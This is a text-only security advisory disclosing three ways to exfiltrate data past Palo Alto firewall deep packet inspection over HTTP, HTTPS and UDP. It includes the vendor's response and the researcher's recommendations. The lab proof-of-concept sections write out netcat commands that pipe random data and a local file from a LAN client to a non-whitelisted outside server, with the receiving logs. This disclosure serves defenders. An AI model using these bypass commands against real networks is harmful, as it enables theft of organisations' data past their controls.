Hello,

Please find a text-only version below sent to security mailing lists.

The complete version on "3 vulnerabilities in Palo Alto Deep Packet
Inspection mechanism" is posted here:

https://pierrekim.github.io/blog/2025-03-31-paloalto-dpi-3-vulnerabilities.html

The text version is also posted here:
  https://pierrekim.github.io/advisories/2025-palo-alto-dpi.txt


=== text-version of the advisory  ===

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

## Advisory Information

Title: 3 vulnerabilities in Palo Alto Deep Packet Inspection mechanism
Advisory URL: https://pierrekim.github.io/advisories/2025-palo-alto-dpi.txt
Blog URL: 
https://pierrekim.github.io/blog/2025-03-31-paloalto-dpi-3-vulnerabilities.html
Date published: 2025-03-31
Vendors contacted: Palo Alto
Release mode: Released
CVE: None



## Product description

> Today's Next-Generation Firewalls provide advanced protection for physical or 
> virtual public and private cloud networks.
>
> From 
> https://www.paloaltonetworks.com/network-security/next-generation-firewall
>
> Understand the true identity of your applications.
>
> PAN-OS includes App-ID our patented traffic classification technology. It 
> automatically discovers and controls new applications - even those that try 
> to evade detection by masquerading as legitimate traffic, hopping ports or 
> sneaking through firewalls under encryption. Plus, our latest post-Quantum 
> cryptographic algorithms prohibit nonsanctioned activity, using vulnerability 
> signatures and threat reporting.

> From https://www.paloaltonetworks.com/network-security/pan-os



## Vulnerabilities Summary

Vulnerable versions: all versions of Palo Alto firewalls.

Status of the tested versions in November 2024:

- - PanOS 10.2.8: vulnerable,
- - PanOS 10.2.9-h1: vulnerable,
- - PanOS 11.1.4: vulnerable,
- - PanOS 11.2.0: vulnerable.

The summary of the vulnerabilities is:

1. non-assigned CVE vulnerability - Exfiltration of data using TCP and
80/tcp to any IP - Deep Packet Inspection based on "service-http"
2. non-assigned CVE vulnerability - Exfiltration of data using TCP and
443/tcp to any IP - Deep Packet Inspection based on "service-https"
3. non-assigned CVE vulnerability - Exfiltration of data using UDP and
any port to any IP
3.1 PoC: client.py and server.py

Annexes:

1. Example payload for the Exfiltration of data using TCP and 80/tcp to any IP
2. Example payload for the Exfiltration of data using UDP and any port to any IP

_Miscellaneous notes_:

The Report was provided in November 2024 to the Palo Alto PSIRT. Palo
Alto PSIRT confirmed in January 2025 that I had observed the normal
behavior of the Palo Alto's Deep Packet Inspection mechanisms and
provided this statement in March 2025:

> Reports 1 & 2:
> Our firewall is designed to optimize user experience and minimize disruption. 
> If the firewall encounters HTTP traffic it cannot confidently identify (e.g., 
> Facebook, Reddit), the request is not automatically dropped to avoid false 
> positives and unintended performance issues.
>
> If you'd like to explore an option to drop unidentified traffic, you're 
> welcome to submit a feature request through our support team: 
> https://support.paloaltonetworks.com.
>
> Report 3:
> The firewall requires a certain number of packets for inspection before 
> setting the App-ID to unknown-udp. For rules involving apps with udp/dynamic 
> as their default, the firewall waits until an App-ID is determined before 
> taking action. In this case, the UDP packet count fell below the threshold, 
> so the App-ID remained insufficient-data, and the session was not dropped.
>
> If you'd like the flexibility to adjust this packet threshold, you can submit 
> a feature request through our support team: 
> https://support.paloaltonetworks.com.
>
> Security Classification:
> Since these reports reflect feature requests rather than product defects, 
> they do not qualify as security vulnerabilities under PAN-OS guidelines. We 
> follow CVE Numbering Authority (CNA) Operational Rules to define 
> vulnerabilities. Specifically, rule 4.1.7 states:
>
> "Detection bypass attacks SHOULD NOT be determined to be vulnerabilities 
> unless a product explicitly claims to detect a specific pattern and fails to 
> do so."
>
> Since PAN-OS does not explicitly claim to detect the reported behaviors, this 
> scenario does not meet the criteria for a CVE-classified vulnerability.

Because the vendor confirmed that there are no security risks and I
disagreed on that, this report includes Risks and Recommendations
(that I usually discard in my public security advisories). I did not
include Risk levels.

_Impacts_

Threat actors located in a LAN can exfiltrate data without any
filtering when Deep Packet Inspection firewall rules are configured
without specific destination IP ranges (e.g. only relying on
"application").

Note: it is normal for DPI firewall to let some packets through by
design. The problem mainly lies in the amount of data allowed to pass
through. The official documentation
(https://knowledgebase.paloaltonetworks.com/KCSArticleDetail?id=kA10g000000ClIgCAK)
states that "a maximum of 4 packets or 2000 bytes of data in either
direction (not including the TCP handshake)" will be transmitted
before the communication is blocked. In reality, it appears instead
that up to 256KB can go through the DPI engines before being
effectively blocked by the appliance, so there is a factor 128
compared to the official documentation, allowing an attacker to
exfiltrate terabytes of information. Also, a lot of TCP segments are
allowed before the communication is effectively blocked by the
appliance. These allowed amounts of data and number of packets are not
configurable and are likely hardcoded inside the different Palo Alto's
DPI engines.

My understanding is that the official documentation confuses IP
packets (also called IP datagrams) with TCP segments and UDP
datagrams. Therefore, thanks to fragmentation, it is possible to send
hundreds of fragmented IP packets (corresponding to 4 reassembled IP
packets), which allows data exfiltration.

_Recommendations_

- - Do not use Deep Packet Inspection firewall rules without a
specific destination IP address.
- - In the firewall rules, always define the IPv4 and IPv6 ranges of
the remote services you want to allow - note that this is likely
impossible when relying on Cloud services;
- - Use Palo Alto EDL
(https://docs.paloaltonetworks.com/resources/edl-hosting-service) -
note that the use of EDL will not entirely address all the issues
(e.g. Facebook IP addresses are not provided).



## Summary and Reproducible PoC

A test network was built to analyze the behavior of the Palo Alto
firewalls, and routes were defined in the `kali-lan-client` and the
`kali-wan-server` to transport data through specific versions of Palo
Alto VMs, as shown below.

This configuration allows reaching the `kali-wan-server` from the
`kali-lan-client` using different IP addresses that will route through
different Palo Alto VMs (10.2.8, 10.2.9-h1, 11.1.4 and 11.2.0):

Test network:

[please use the HTML version at
https://pierrekim.github.io/blog/2025-03-31-paloalto-dpi-3-vulnerabilities.html]

An additional Palo Alto VM was installed (PA-VM-ESX-11.1.4-license)
with a license that supports advanced options (e.g. SSL/TLS
interception) with a similar configuration as the existing
PA-VM-ESX-11.1.4 VM. This specific VM allows testing options that can
only be enabled using a license.


## Details - Exfiltration of data using TCP and 80/tcp - Deep Packet
Inspection based on "service-http"

### Observations

It was observed that it is possible to exfiltrate any amount of data
to the Internet using TCP with TCP port 80 when the `service-http` is
selected with a specific application.

For example, when adding access to a website through an application
(e.g. `ms-office365`, `facebook`, ...), the Service/URL will be set to
`service-http` or `application-default`.

The `application-default` service will automatically enable
`service-http` for websites.

And the `service-http` Deep Packet Inspection (DPI) mechanism will
allow the exfiltration of data to any HTTP website as shown below
(even to non-whitelisted websites/IPs):

Basic firewall rules:

[please use the HTML version at
https://pierrekim.github.io/blog/2025-03-31-paloalto-dpi-3-vulnerabilities.html]

[please use the HTML version at
https://pierrekim.github.io/blog/2025-03-31-paloalto-dpi-3-vulnerabilities.html]

Adding either `facebook` or `ms-office365` or any other website will
allow data exfiltration.

Since no IP addresses are specified, this rule will match any IP. This
functionality is completely broken and allows an attacker to
exfiltrate chunks of 21KB of data to any IP before the connection is
correctly blocked by the Palo Alto firewall.

The remote server will have a netcat server listening on port 80/tcp
and will receive files - __this server is NOT whitelisted__.

Receiving a file over TCP from the client:

    kali-wan-server# for i in $(seq 1 10); do nc -l -v -p 80 >
exfiltration-http-$i;sleep 1;done
    listening on [any] 80 ...
    192.168.1.2: inverse host lookup failed: Host name lookup failure
    connect to [172.16.35.3] from (UNKNOWN) [192.168.1.2] 52832
    ^C
    listening on [any] 80 ...
    192.168.1.2: inverse host lookup failed: Host name lookup failure
    connect to [172.16.35.3] from (UNKNOWN) [192.168.1.2] 52838
    ^C
    listening on [any] 80 ...
    192.168.1.2: inverse host lookup failed: Host name lookup failure
    connect to [172.16.35.3] from (UNKNOWN) [192.168.1.2] 52852
    ^C
    listening on [any] 80 ...
    192.168.1.2: inverse host lookup failed: Host name lookup failure
    connect to [172.16.35.3] from (UNKNOWN) [192.168.1.2] 37414
    ^C
    listening on [any] 80 ...
    192.168.1.2: inverse host lookup failed: Host name lookup failure
    connect to [172.16.35.3] from (UNKNOWN) [192.168.1.2] 37424
    ^C
    listening on [any] 80 ...
    192.168.1.2: inverse host lookup failed: Host name lookup failure
    connect to [172.16.35.3] from (UNKNOWN) [192.168.1.2] 37436
    ^C
    listening on [any] 80 ...
    192.168.1.2: inverse host lookup failed: Host name lookup failure
    connect to [172.16.35.3] from (UNKNOWN) [192.168.1.2] 37440
    ^C
    listening on [any] 80 ...
    192.168.1.2: inverse host lookup failed: Host name lookup failure
    connect to [172.16.35.3] from (UNKNOWN) [192.168.1.2] 36256
    ^C
    listening on [any] 80 ...
    192.168.1.2: inverse host lookup failed: Host name lookup failure
    connect to [172.16.35.3] from (UNKNOWN) [192.168.1.2] 36270
    ^C
    listening on [any] 80 ...
    192.168.1.2: inverse host lookup failed: Host name lookup failure
    connect to [172.16.35.3] from (UNKNOWN) [192.168.1.2] 36280
    ^C
    kali-wan-server#

The client sends random data to the remote server using port 80/tcp.

Sending random data to any remote server on port 80/tcp (the rand.hex
file was generated using `dd if=/dev/urandom bs=8K count=1 | hexdump
-C > rand.hex`):

    kali-wan-client% sha256sum rand.hex
    fa0666341096d42e263a023f57714f45034eebf02e338a3b837a3b29ba10562f  rand.hex
    kali-lan-client% for i in $(seq 1 10); do nc -v 172.16.35.3 80 <
rand.hex;sleep 1.5;done
    test [172.16.35.3] 80 (http) open
    test [172.16.35.3] 80 (http) open
    test [172.16.35.3] 80 (http) open
    test [172.16.35.3] 80 (http) open
    test [172.16.35.3] 80 (http) open
    test [172.16.35.3] 80 (http) open
    test [172.16.35.3] 80 (http) open
    test [172.16.35.3] 80 (http) open
    test [172.16.35.3] 80 (http) open
    test [172.16.35.3] 80 (http) open

And we can confirm that the remote server successfully received files
from the client.

Files received on the server:

    kali-wan-server# ls -la
    total 248
    drwxr-xr-x 2 root root  4096 Oct 23 19:38 .
    drwxr-xr-x 4 root root  4096 Oct 23 19:31 ..
    -rw-r--r-- 1 root root 21226 Oct 23 19:38 exfiltration-http-1
    -rw-r--r-- 1 root root 21226 Oct 23 19:39 exfiltration-http-10
    -rw-r--r-- 1 root root 21226 Oct 23 19:38 exfiltration-http-2
    -rw-r--r-- 1 root root 21226 Oct 23 19:38 exfiltration-http-3
    -rw-r--r-- 1 root root 21226 Oct 23 19:38 exfiltration-http-4
    -rw-r--r-- 1 root root 21226 Oct 23 19:38 exfiltration-http-5
    -rw-r--r-- 1 root root 21226 Oct 23 19:39 exfiltration-http-6
    -rw-r--r-- 1 root root 21226 Oct 23 19:39 exfiltration-http-7
    -rw-r--r-- 1 root root 21226 Oct 23 19:39 exfiltration-http-8
    -rw-r--r-- 1 root root 21226 Oct 23 19:39 exfiltration-http-9
    kali-wan-server# sha256sum exfiltration-http-*
    fa0666341096d42e263a023f57714f45034eebf02e338a3b837a3b29ba10562f
exfiltration-http-1
    fa0666341096d42e263a023f57714f45034eebf02e338a3b837a3b29ba10562f
exfiltration-http-2
    fa0666341096d42e263a023f57714f45034eebf02e338a3b837a3b29ba10562f
exfiltration-http-3
    fa0666341096d42e263a023f57714f45034eebf02e338a3b837a3b29ba10562f
exfiltration-http-4
    fa0666341096d42e263a023f57714f45034eebf02e338a3b837a3b29ba10562f
exfiltration-http-5
    fa0666341096d42e263a023f57714f45034eebf02e338a3b837a3b29ba10562f
exfiltration-http-6
    fa0666341096d42e263a023f57714f45034eebf02e338a3b837a3b29ba10562f
exfiltration-http-7
    fa0666341096d42e263a023f57714f45034eebf02e338a3b837a3b29ba10562f
exfiltration-http-8
    fa0666341096d42e263a023f57714f45034eebf02e338a3b837a3b29ba10562f
exfiltration-http-9
    fa0666341096d42e263a023f57714f45034eebf02e338a3b837a3b29ba10562f
exfiltration-http-10
    kali-wan-server#

Content of the random data - Random data sent to the remote server
(base64 version) - found in the Annexes.

An attacker can exfiltrate files with chunks of 21 KB without any filtering.

It was determined that exfiltration is due to dependencies of applications.

For example, the `facebook` application will import several
dependencies that will enable data exfiltration.

Dependencies automatically added when adding access to applications:

[please use the HTML version at
https://pierrekim.github.io/blog/2025-03-31-paloalto-dpi-3-vulnerabilities.html]

### Risk

Threat actors can exfiltrate data without any filtering.

### Recommendation

There are vulnerabilities inside the `service-http` service in Palo
Alto firewalls when using a specific application (Palo Alto wording
for available Deep Packet Inspection mechanisms), allowing an attacker
to transmit any data to the Internet. The application linked to the
`http` service provides information to the Deep Packet Inspection
(DPI) mechanisms implemented in the `service-http` service to block
any unwanted traffic.

Any rule based on the `service-http` service (e.g. access to websites)
with a specific application without a destination address is
vulnerable to data exfiltration.

Do not use DPI-based rules.

In the firewall rules, always specify the IPv4 and IPv6 addresses of
the remote services that you want to allow.



## Details - Exfiltration of data using TCP and 443/tcp - Deep Packet
Inspection based on "service-https"

### Observations

It was observed that it is possible to exfiltrate any amount of data
to the Internet using TCP with the port 443 when the `service-https`
is selected with a specific application.

For example, when adding access to a website through an application
(e.g. `ms-office365`, `facebook`, ...), the Service/URL will be set to
`service-https` or `application-default`.

The `application-default` service will automatically enable
`service-https` for websites.

And the `service-https` Deep Packet Inspection (DPI) mechanism will
allow the exfiltration of data to any HTTPS website as shown below
(even to non-whitelisted websites/IPs).

Basic firewall rules:

[please use the HTML version at
https://pierrekim.github.io/blog/2025-03-31-paloalto-dpi-3-vulnerabilities.html]

[please use the HTML version at
https://pierrekim.github.io/blog/2025-03-31-paloalto-dpi-3-vulnerabilities.html]

Adding either `reddit`, `facebook` or `ms-office365` or any other
website will allow data exfiltration.

Since no IP addresses are specified, this rule will match any IP. This
functionality is completely broken and allows an attacker to
exfiltrate chunks of 5KB of data to any IP before the connection is
correctly blocked by the Palo Alto firewall.

The remote server will have a netcat server listening on port 443/tcp
and will receive files - __this server is NOT whitelisted__.

Receiving a file over TCP from the client:

    kali-wan-server# for i in $(seq 1 10); do nc -l -v -p 443 >
exfiltration-https-reddit-$i;sleep 1;done
    listening on [any] 443 ...
    192.168.1.2: inverse host lookup failed: Host name lookup failure
    connect to [172.16.35.3] from (UNKNOWN) [192.168.1.2] 55438
    ^C
    listening on [any] 443 ...
    192.168.1.2: inverse host lookup failed: Host name lookup failure
    connect to [172.16.35.3] from (UNKNOWN) [192.168.1.2] 55454
    ^C
    listening on [any] 443 ...
    192.168.1.2: inverse host lookup failed: Host name lookup failure
    connect to [172.16.35.3] from (UNKNOWN) [192.168.1.2] 55460
    ^C
    listening on [any] 443 ...
    192.168.1.2: inverse host lookup failed: Host name lookup failure
    connect to [172.16.35.3] from (UNKNOWN) [192.168.1.2] 43658
    ^C
    listening on [any] 443 ...
    192.168.1.2: inverse host lookup failed: Host name lookup failure
    connect to [172.16.35.3] from (UNKNOWN) [192.168.1.2] 43664
    ^C
    listening on [any] 443 ...
    192.168.1.2: inverse host lookup failed: Host name lookup failure
    connect to [172.16.35.3] from (UNKNOWN) [192.168.1.2] 43682
    ^C
    listening on [any] 443 ...
    192.168.1.2: inverse host lookup failed: Host name lookup failure
    connect to [172.16.35.3] from (UNKNOWN) [192.168.1.2] 43694
    ^C
    listening on [any] 443 ...
    192.168.1.2: inverse host lookup failed: Host name lookup failure
    connect to [172.16.35.3] from (UNKNOWN) [192.168.1.2] 60390
    ^C
    listening on [any] 443 ...
    192.168.1.2: inverse host lookup failed: Host name lookup failure
    connect to [172.16.35.3] from (UNKNOWN) [192.168.1.2] 60406
    ^C
    listening on [any] 443 ...
    192.168.1.2: inverse host lookup failed: Host name lookup failure
    connect to [172.16.35.3] from (UNKNOWN) [192.168.1.2] 60416
    ^C
    kali-wan-server#

The client sends random data to the remote server using port 443/tcp.

Sending random data to any remote server on port 443/tcp:

    kali-lan-client# for i in $(seq 1 10); do cat /dev/urandom |
hexdump -C | nc -v 172.16.35.3 443;sleep 1;done
    test [172.16.35.3] 443 (https) open
    ^C
    test [172.16.35.3] 443 (https) open
    ^C
    test [172.16.35.3] 443 (https) open
    ^C
    test [172.16.35.3] 443 (https) open
    ^C
    test [172.16.35.3] 443 (https) open
    ^C
    test [172.16.35.3] 443 (https) open
    ^C
    test [172.16.35.3] 443 (https) open
    ^C
    test [172.16.35.3] 443 (https) open
    ^C
    test [172.16.35.3] 443 (https) open
    ^C
    test [172.16.35.3] 443 (https) open
    ^C
    kali-lan-client#

We can confirm that the remote server successfully received files from
the client.

Files received on the server:

    kali-wan-server# ls -la
    total 88
    drwxr-xr-x 2 root root 4096 Oct 23 19:21 .
    drwxr-xr-x 3 root root 4096 Oct 23 19:18 ..
    -rw-r--r-- 1 root root 5792 Oct 23 19:21 exfiltration-https-reddit-1
    -rw-r--r-- 1 root root 5792 Oct 23 19:21 exfiltration-https-reddit-10
    -rw-r--r-- 1 root root 5792 Oct 23 19:21 exfiltration-https-reddit-2
    -rw-r--r-- 1 root root 5792 Oct 23 19:21 exfiltration-https-reddit-3
    -rw-r--r-- 1 root root 5792 Oct 23 19:21 exfiltration-https-reddit-4
    -rw-r--r-- 1 root root 5792 Oct 23 19:21 exfiltration-https-reddit-5
    -rw-r--r-- 1 root root 5792 Oct 23 19:21 exfiltration-https-reddit-6
    -rw-r--r-- 1 root root 5792 Oct 23 19:21 exfiltration-https-reddit-7
    -rw-r--r-- 1 root root 5792 Oct 23 19:21 exfiltration-https-reddit-8
    -rw-r--r-- 1 root root 5792 Oct 23 19:21 exfiltration-https-reddit-9
    kali-wan-server# cat exfiltration-https-reddit-1
    00000000  56 0a 71 05 f1 00 56 96  25 88 e4 ab 8a 9a 94 4e
|V.q...V.%......N|
    00000010  10 e1 62 26 72 67 bb 93  61 c6 26 56 f5 8a c0 ce
|..b&rg..a.&V....|
    00000020  a0 a9 b5 27 ea d6 81 c4  3a 0a 44 6a d5 6e 52 d3
|...'....:.Dj.nR.|
    00000030  44 2d c1 06 f4 46 12 0d  8f e7 96 63 35 25 26 cb
|D-...F.....c5%&.|
    00000040  18 c5 3b 1b a8 a6 53 a6  cc b6 ed cc d7 a3 fa 86
|..;...S.........|
    00000050  94 d5 43 c8 08 a0 f1 01  82 d7 16 ed 36 48 0e 4f
|..C.........6H.O|
    00000060  65 28 4d e5 d7 bf 20 f4  b2 00 b8 89 b8 0d 52 2c
|e(M... .......R,|
    00000070  ba b6 42 9c 67 87 9c 94  e1 4a d7 8c 2b e2 97 79
|..B.g....J..+..y|
    00000080  74 b8 63 b2 c3 fd 26 0e  1d b9 00 65 ec 79 a3 f7
|t.c...&....e.y..|
    00000090  cc eb ef 18 61 dc 0b b6  72 81 36 e2 c7 34 9b 79
|....a...r.6..4.y|
    000000a0  c7 ac ea 81 48 ca 0a 17  80 7c df dd ca 0d 6d ba
|....H....|....m.|
    000000b0  fe 17 a3 f4 3c 94 fa f7  7b 10 56 3b a9 63 65 2b
|....<...{.V;.ce+|
    000000c0  f4 a1 fd a1 36 85 06 28  d8 80 50 d5 1b 73 ee ad
|....6..(..P..s..|
    000000d0  47 8c d2 eb 73 44 d3 76  be cb 0d c7 a7 ea 7b 1e
|G...sD.v......{.|
    000000e0  24 a0 e1 78 80 17 7d cf  5c 90 7c 56 a2 ac 38 e5
|$..x..}.\.|V..8.|
    000000f0  48 ff 7d d8 92 a7 a9 dc  9e 50 48 e4 37 3e 39 0b
|H.}......PH.7>9.|
    00000100  bb 40 3c 8b d7 54 c3 41  c3 b7 18 88 21 c9 17 e7
|.@<..T.A....!...|
    00000110  52 e4 bc 8c a8 d2 93 45  35 7a 01 f6 fb e7 14 93
|R......E5z......|
    00000120  d1 9c 86 2f b2 72 c7 0a  74 83 cc 7e 35 95 00 44
|.../.r..t..~5..D|
    00000130  37 06 71 6d 0b 4f 02 5f  6d e1 89 c9 74 a5 fd e5
|7.qm.O._m...t...|
    00000140  66 49 ef e7 23 c5 0e f3  34 7d 4a 18 35 8d 19 47
|fI..#...4}J.5..G|
    00000150  83 7e 5c 96 57 13 30 cf  0a d8 f3 7c ff db 41 07
|.~\.W.0....|..A.|
    00000160  50 04 a6 4b 4f 12 7f 59  09 90 6e 98 09 50 cd e0
|P..KO..Y..n..P..|
    00000170  b0 32 6a 0e b6 1c 7e 4f  81 bf 71 e1 5f a4 63 75
|.2j...~O..q._.cu|
    00000180  ba ee dc e9 d5 46 55 99  8e 8f 94 e1 a1 5d ea d4
|.....FU......]..|
    00000190  c1 e4 90 89 f9 3d 33 3c  e0 38 f9 26 e0 76 9c f1
|.....=3<.8.&.v..|
    000001a0  fb 71 57 4d 82 24 af ad  ca 5f 66 cd cc a1 db d9
|.qWM.$..._f.....|
    000001b0  28 2e f7 22 e0 fe de 01  c7 83 b1 20 6b 1d e6 ec
|(.."....... k...|
    000001c0  e1 62 f0 df de e1 86 c3  d7 d6 3a 1c 7c 33 a8 41
|.b........:.|3.A|
    000001d0  bf 51 8c 47 d4 be f1 fc  b5 70 18 1c 0e a3 e9 4e
|.Q.G.....p.....N|
    000001e0  67 0e 52 d3 31 d3 be d3  90 f8 59 c4 99 56 1a 84
|g.R.1.....Y..V..|
    000001f0  fd 25 d0 d2 0c 6b ec fc  e0 d5 60 dc fe c2 9f 7c
|.%...k....`....||
    00000200  d9 67 3b f9 10 5e db 27  9c 0c 72 9c 9b df eb c6
|.g;..^.'..r.....|
    00000210  2b c6 cb d4 6d 4e 06 56  13 a0 02 66 05 bb 94 7a
|+...mN.V...f...z|
    00000220  01 8f 0b 1e c5 c1 39 4e  62 2c ab 2d f3 38 ee b4
|......9Nb,.-.8..|
    00000230  09 a2 9f 02 2d d8 e6 1a  df e1 e6 56 d0 5a 8f 50
|....-......V.Z.P|
    00000240  cc 10 fa 55 64 aa 78 f8  0c 1a 53 f9 da 0d 25 e8
|...Ud.x...S...%.|
    00000250  1d e2 21 83 a6 0a 8f c1  e0 46 d2 fb 2b dd 2c 2e
|..!......F..+.,.|
    00000260  f1 e7 55 59 1f ae e9 03  2a 6b 49 24 85 65 f8 4c
|..UY....*kI$.e.L|
    00000270  ee df b6 34 4f 15 08 71  9b a3 b7 24 38 a4 80 c9
|...4O..q...$8...|
    00000280  84 e2 a0 08 ba 93 37 f6  40 6d 30 93 15 48 65 52
|......7...@m0..her|
    00000290  5e 74 f1 88 6d 5b 46 c4  2c 94 66 c4 32 c5 35 94
|^t..m[F.,.f.2.5.|
    000002a0  65 e4 8d 97 4e 18 11 ba  0c a0 81 3e 93 0e 7b c0
|e...N......>..{.|
    000002b0  cb 6f 52 f4 c2 15 d8 25  2c 7a b1 70 1f dc 4a 14
|.oR....%,z.p..J.|
    000002c0  ad 72 4b 48 af df 92 a6  b8 9e 5b d3 e9 dc 22 be
|.rKH......[...".|
    000002d0  f5 53 2a d7 ef 4b 2f 58  7b f3 1e 4e b1 6e b5 3f
|.S*..K/X{..N.n.?|
    000002e0  17 e2 1b 83 58 c3 0f fa  60 d9 87 05 2c 89 7e bc
|....X...`...,.~.|
    000002f0  ec 1f 31 8a 08 aa 20 bb  ea a0 75 c8 bf a5 25 44
|..1... ...u...%D|
    00000300  e7 46 21 78 27 c0 ca 87  0f 4e b8 fc 4e 66 92 c5
|.F!x'....N..Nf..|
    00000310  bc 9a a2 84 9d aa fd e1  68 39 47 be d8 62 66 26
|........h9G..bf&|
    00000320  87 ec 93 df 53 94 2a a0  f1 35 0f 82 e6 cc 9c bd
|....S.*..5......|
    00000330  a3 e7 30 f6 6a d4 c2 73  37 3a e6 39 d3 1e 6d 98
|..0.j..s7:.9..m.|
    00000340  bf 93 22 d2 44 59 46 20  61 fd 0c 65 84 58 2c 37
|..".DYF a..e.X,7|
    00000350  84 da 05 3a 73 b0 15 4d  38 9c 7a 72 1b ae c5 3f
|...:s..M8.zr...?|
    00000360  ab eb 47 a1 0d a0 45 32  7a 70 89 31 03 14 0c 5c
|..G...E2zp.1...\|
    00000370  26 dc bc 96 6c 55 67 60  9b fa 05 88 91 61 1c 2c
|&...lUg`.....a.,|
    00000380  80 59 be b2 25 32 90 e3  25 a5 26 2c 61 9f 4d ac
|.Y..%2..%.&,a.M.|
    00000390  ec ca aa 63 54 e7 1b f7  32 d1 18 14 f7 43 ae ba
|...cT...2....C..|
    000003a0  87 75 2c 90 5d b9 ed 6b  a9 2f 81 c3 75 29 e0 0c
|.u,.]..k./..u)..|
    000003b0  99 94 89 d5 41 9b b9 47  cb 50 c6 7f be d8 fa 10
|....A..G.P......|
    000003c0  23 10 83 31 86 b6 4d 1e  e8 63 9f d8 8b 25 15 f2
|#..1..M..c...%..|
    000003d0  00 f1 2f ee 51 60 1e c7  e3 22 e3 a4 6c 4c b8 3c
|../.Q`..."..lL.<|
    000003e0  6a 30 31 d0 38 f0 f5 13  5e 20 5e a3 60 1a a7 2c
|j01.8...^ ^.`..,|
    000003f0  16 f9 71 2c d5 2b a3 36  96 c2 d2 90 6a 57 89 18
|..q,.+.6....jW..|
    00000400  7e 0b f9 c2 63 ce eb db  f2 ce 84 9d a0 ab 6d b0
|~...c.........m.|
    00000410  90 3a bd a7 5d 6f af d5  72 d2 27 0a 5b 32 f2 06
|.:..]o..r.'.[2..|
    00000420  f2 c9 e8 1d c9 4e 1c 54  ca f1 39 80 1f 82 bb 9d
|.....N.T..9.....|
    00000430  d3 ef 01 3d e8 5f d9 db  24 bf f3 7c a6 5c 7e ad
|...=._..$..|.\~.|
    00000440  61 f7 a5 9b a4 e3 2b 29  76 b1 62 c3 89 55 82 91
|a.....+)v.b..U..|
    00000450  f8 c3 3b 51 9f fa 01 db  38 cd b1 3c 2d cb 94 8e
|..;Q....8..<-...|
    00000460  54 1c 0c 84 69 5f 11 12  de 46 ce b5 d5 82 9c 84
|T...i_...F......|
    00000470  52 69 a1 2a 29 64 95 5b  eb cb 8c af 0a 83 5d aa
|Ri.*)d.[......].|
    00000480  93 69 e7 e5 aa 88 35 98  60 74 3b e7 fd 02 a4 93
|.i....5.`t;.....|
    00000490  a1 e2 4b 3f 83
    kali-wan-server#

An attacker can exfiltrate files without any filtering. For example,
`/usr/share/doc/libxml-writer-perl/examples/directory-as-atom.pl`.

Sending a file over TCP to 172.16.35.3:443/tcp:

    kali-lan-client# ls -la
/usr/share/doc/libxml-writer-perl/examples/directory-as-atom.pl
    -rwxr-xr-x 1 root root 3470 Apr 24  2020
/usr/share/doc/libxml-writer-perl/examples/directory-as-atom.pl
    kali-lan-client# cat
/usr/share/doc/libxml-writer-perl/examples/directory-as-atom.pl| nc -v
172.16.35.3 443
    test [172.16.35.3] 443 (https) open
    ^C
    kali-lan-client#

And the server (172.16.35.3) received the file:

    kali-wan-server# nc -l -v -p 443 > directory-as-atom.pl
    listening on [any] 443 ...
    192.168.1.2: inverse host lookup failed: Host name lookup failure
    connect to [172.16.35.3] from (UNKNOWN) [192.168.1.2] 54290

    kali-wan-server# ls -la directory-as-atom.pl
    -rw-r--r-- 1 root root 3470 Oct 23 19:24 directory-as-atom.pl

    kali-wan-server# cat directory-as-atom.pl
    #!/usr/bin/perl -w

    # A full example that presents a directory as an Atom feed
    # It demonstrates namespace and formatting control.
    # Intended to productise the /junk convention.

    # Usage: directory-as-atom.pl <local directory> <public URL> [feed
title] [feed subtitle]

    # e.g., directory-as-atom.pl /home/user/public_html/junk
http://www.example.com/~user/junk/ >index.atom

    use strict;

    use DirHandle;
    use URI::URL;
    use DateTime;

    use XML::Writer;

    my ($dir, $base, $title, $subtitle) = @ARGV;

    defined($base) or die "Usage: directory-as-atom.pl <local
directory> <public URL> [feed title] [feed subtitle]";

    $dir ||= '.';

    $title ||= '/junk/';
    $subtitle ||= 'ls -ltr $dir | head -10';


    my $uid = (stat($dir))[4];

    my $dh = DirHandle->new($dir) || die "Unable to opendir $dir: $!";

    my @de;

    while(my $e = $dh->read()) {
            # Skip dotfiles
            next if ($e =~ /^\./);

            my $n = "$dir/$e";

            next unless (-f $n);

            my ($mtime, $bytes) = (stat($n))[9,7];

            my $desc; # undef, for now

            if (defined($mtime)) {push(@de, [$e, $mtime, $desc, $bytes])};
    }

    undef($dh);
    [...]
    kali-wan-server#

### Risk

Threat actors can exfiltrate data without any filtering.

### Recommendation

There are vulnerabilities inside the `service-https` service in Palo
Alto firewalls when using a specific application (Palo Alto wording
for available Deep Packet Inspection mechanisms), allowing an attacker
to transmit any data to the Internet. The application linked to the
`https` service provides information to the Deep Packet Inspection
(DPI) mechanisms implemented in the `service-https` service to block
any unwanted traffic.

Any rule based on the `service-https` service (e.g. access to
websites) with a specific application without a destination address is
vulnerable to data exfiltration.

Do not use DPI-based rules.

In the firewall rules, always specify the IPv4 and IPv6 addresses of
the remote services that you want to allow.



## Exfiltration of data using UDP and any port

### Observations

It was observed that it is possible to exfiltrate any amount of data
to the Internet using UDP when adding specific applications.

For example, when adding access to a website through an application
(e.g. `ms-office365`, ...), the Service/URL will be set to
`application-default`.

The `application-default` service will automatically allow
communication to any remote UDP port for `ms-office365`, allowing the
exfiltration of data to any remote IP as shown below.

Basic firewall rules:

[please use the HTML version at
https://pierrekim.github.io/blog/2025-03-31-paloalto-dpi-3-vulnerabilities.html]

[please use the HTML version at
https://pierrekim.github.io/blog/2025-03-31-paloalto-dpi-3-vulnerabilities.html]

The "full-https-access" firewall rule only provides access to reddit
(application: `reddit` with service: `service-https`) and is unrelated
to this test.

Since no IP addresses are specified, this rule will match any IP. This
functionality is completely broken and allows an attacker to
exfiltrate multiple 64KB-chunks of data to any IP before the
connection is correctly blocked by the Palo Alto firewall.

The remote server will have a netcat server listening on port 82/udp
and will receive files - __this server is NOT whitelisted__.

Receiving a file over UDP from the client:

    kali-wan-server% for i in $(seq 1 10); do nc -l -v -n -u -p 82 >
exfiltration-udp-$i;sleep 1;done
    listening on [any] 82 ...
    connect to [172.16.35.3] from (UNKNOWN) [192.168.1.2] 49519
    ^C
    listening on [any] 82 ...
    connect to [172.16.35.3] from (UNKNOWN) [192.168.1.2] 42878
    ^C
    listening on [any] 82 ...
    connect to [172.16.35.3] from (UNKNOWN) [192.168.1.2] 47965
    ^C
    listening on [any] 82 ...
    connect to [172.16.35.3] from (UNKNOWN) [192.168.1.2] 42639
    ^C
    listening on [any] 82 ...
    connect to [172.16.35.3] from (UNKNOWN) [192.168.1.2] 52678
    ^C
    listening on [any] 82 ...
